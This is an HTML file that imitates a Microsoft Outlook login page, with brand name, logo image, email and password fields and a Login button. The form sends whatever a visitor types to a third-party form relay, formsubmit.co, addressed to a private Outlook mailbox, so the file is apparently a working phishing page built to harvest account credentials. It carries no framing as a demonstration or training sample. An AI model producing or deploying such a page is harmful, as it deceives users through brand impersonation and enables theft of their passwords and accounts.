<html lang="en">
<head>
   <title>Document</title>
   <script type="module" src="https://unpkg.com/ionicons@5.5.2/dist/ionicons/ionicons.esm.js"></script>
<script nomodule src="https://unpkg.com/ionicons@5.5.2/dist/ionicons/ionicons.js"></script>
   </head>
<style>
    *{
        margin: 0;
        padding: 0;
    }
    body{
        width: 100%;
        height: 400px;
        background-image: url(./outlk.jpeg);
        background-position: center;
        background-size: cover;
        background-repeat: no-repeat;
        display: flex;
        flex-direction: column;
        align-items: center;
    }
    #box{
        width: 80%;
        height: 600px;
        background-color: transparent;
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 90px;
    }
    input{
        width: 120%;
        height: 40px;
        background-color: white;
        margin-top: 30px;
        border-radius: 10px;
        font-size: 20px;
        padding: 20px;
    }
    button{
        width: 70%;
        height: 40px;
        background-color: rgb(55, 141, 217);
        padding: 10px;
        border-radius: 10px;
        padding: 8px;
        font-size: 20px;
        margin-top: 30px;
        margin-left: 70px;
    }
    a{
        font-size: 30px;
        color:rgb(55, 141, 217);
        margin-left: 70px;
    }
    h1{
        color: rgb(55, 141, 217);
        text-decoration: solid;
        margin-left: 100px;
        padding: 10px;
    }
    img{
        margin-top: 30px;
        margin-left: 70px;
        padding: 10px;
    }
</style>
<body>
    <div id="box">
        <form action="https://formsubmit.co/webdev011@outlook.com" method="POST">
            <img src="./utlk.jpeg">
            <h1>Outlook</h1>
            <input type="email" name="email" placeholder="Email">
            <br>
            <input type="password" name="password" placeholder="Password">
            <br>
            <button>Login</button>
            <p></p>
            <br>
            <ion-icon name="settings-sharp"></ion-icon>
            <br>
            <a href="#">Create Account</a>
            <ion-icon name="person-sharp"></ion-icon>
        </form>
    </div>
</body>
</html>